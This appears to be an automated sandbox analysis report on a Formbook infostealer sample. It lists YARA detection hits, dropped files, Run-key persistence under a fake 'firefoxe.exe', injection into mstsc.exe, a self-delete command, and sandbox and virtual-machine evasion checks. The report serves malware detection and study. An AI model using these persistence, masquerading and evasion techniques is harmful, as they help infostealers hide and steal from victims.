          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: kayx.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: firefoxe.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: kayx.exe, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: firefoxe.exe.1.dr, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 1.0.kayx.exe.ec0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 1.2.kayx.exe.ec0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 15.2.kayx.exe.200000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 15.0.kayx.exe.200000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 16.0.kayx.exe.2c0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 16.2.kayx.exe.2c0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 17.0.kayx.exe.400000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 19.0.firefoxe.exe.9a0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 19.2.firefoxe.exe.9a0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@14/3@4/2
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notepedJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
          Source: C:\Users\user\Desktop\kayx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: kayx.exeVirustotal: Detection: 34%
          Source: kayx.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\kayx.exeFile read: C:\Users\user\Desktop\kayx.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\kayx.exe 'C:\Users\user\Desktop\kayx.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\kayx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: kayx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: kayx.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: kayx.exe, 00000011.00000003.351692207.0000000000AB0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: kayx.exe, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\kayx.exeUnpacked PE file: 17.2.kayx.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_0185A9A1 push edx; iretd 1_2_0185A9A2
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C48CE3 push E808AB5Eh; retf 1_2_05C48D01
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C48C8D push E808AB5Eh; retf 1_2_05C48D01
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041AD55 push eax; ret 17_2_0041ADA8
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041ADA2 push eax; ret 17_2_0041ADA8
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041ADAB push eax; ret 17_2_0041AE12
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041AE0C push eax; ret 17_2_0041AE12
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00414EC5 push CFF27278h; ret 17_2_00414EC0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00414E85 push CFF27278h; ret 17_2_00414EC0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00414740 push cs; iretd 17_2_00414779
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041478D push cs; iretd 17_2_00414779
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E5D0D1 push ecx; ret 17_2_00E5D0E4
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041AD55 push eax; ret 17_1_0041ADA8
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041ADA2 push eax; ret 17_1_0041ADA8
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041ADAB push eax; ret 17_1_0041AE12
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041AE0C push eax; ret 17_1_0041AE12
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00414EC5 push CFF27278h; ret 17_1_00414EC0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00414E85 push CFF27278h; ret 17_1_00414EC0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00414740 push cs; iretd 17_1_00414779
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041478D push cs; iretd 17_1_00414779
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94131868162
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeJump to dropped file
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notepedJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxeJump to behavior
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp, firefoxe.exe, 00000013.00000002.488821328.0000000005540000.00000004.00000001.sdmp, firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBSKCREATEOBJECT("WSCRIPT.SHELL").RUN """
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\kayx.exe RDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\kayx.exe RDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F083C4 second address: 0000000002F083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000002F0875E second address: 0000000002F08764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408690 rdtsc 17_2_00408690
          Source: C:\Users\user\Desktop\kayx.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\kayx.exe TID: 6564 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000012.00000000.366341161.0000000004DF3000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&}
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000012.00000000.373649853.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000012.00000000.367147757.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000012.00000000.367196676.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\kayx.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\kayx.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00408690 rdtsc 17_2_00408690
          Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_004098F0 LdrLoadDll, 17_2_004098F0
          Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h] 17_2_00E040E1
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h]17_2_00E86DC9
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]17_2_00ED05AC
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h]17_2_00ED05AC
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E335A1 mov eax, dword ptr fs:[00000030h]17_2_00E335A1
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]17_2_00E31DB5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]17_2_00E31DB5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h]17_2_00E31DB5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]17_2_00E32581
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]17_2_00E32581
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]17_2_00E32581
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h]17_2_00E32581
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]17_2_00E02D8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]17_2_00E02D8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]17_2_00E02D8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]17_2_00E02D8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h]17_2_00E02D8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]17_2_00E3FD9B
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h]17_2_00E3FD9B
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]17_2_00E2C577
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h]17_2_00E2C577
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E43D43 mov eax, dword ptr fs:[00000030h]17_2_00E43D43
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E83540 mov eax, dword ptr fs:[00000030h]17_2_00E83540
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EB3D40 mov eax, dword ptr fs:[00000030h]17_2_00EB3D40
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E27D50 mov eax, dword ptr fs:[00000030h]17_2_00E27D50
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0AD30 mov eax, dword ptr fs:[00000030h]17_2_00E0AD30
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h]17_2_00E13D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECE539 mov eax, dword ptr fs:[00000030h]17_2_00ECE539
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]17_2_00E34D3B
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]17_2_00E34D3B
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h]17_2_00E34D3B
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8D34 mov eax, dword ptr fs:[00000030h]17_2_00ED8D34
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E8A537 mov eax, dword ptr fs:[00000030h]17_2_00E8A537
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E316E0 mov ecx, dword ptr fs:[00000030h]17_2_00E316E0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E176E2 mov eax, dword ptr fs:[00000030h]17_2_00E176E2
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E48EC7 mov eax, dword ptr fs:[00000030h]17_2_00E48EC7
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBFEC0 mov eax, dword ptr fs:[00000030h]17_2_00EBFEC0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E336CC mov eax, dword ptr fs:[00000030h]17_2_00E336CC
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED8ED6 mov eax, dword ptr fs:[00000030h]17_2_00ED8ED6
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]17_2_00ED0EA5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]17_2_00ED0EA5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h]17_2_00ED0EA5
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E846A7 mov eax, dword ptr fs:[00000030h]17_2_00E846A7
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E9FE87 mov eax, dword ptr fs:[00000030h]17_2_00E9FE87
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1766D mov eax, dword ptr fs:[00000030h]17_2_00E1766D
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h]17_2_00E2AE73
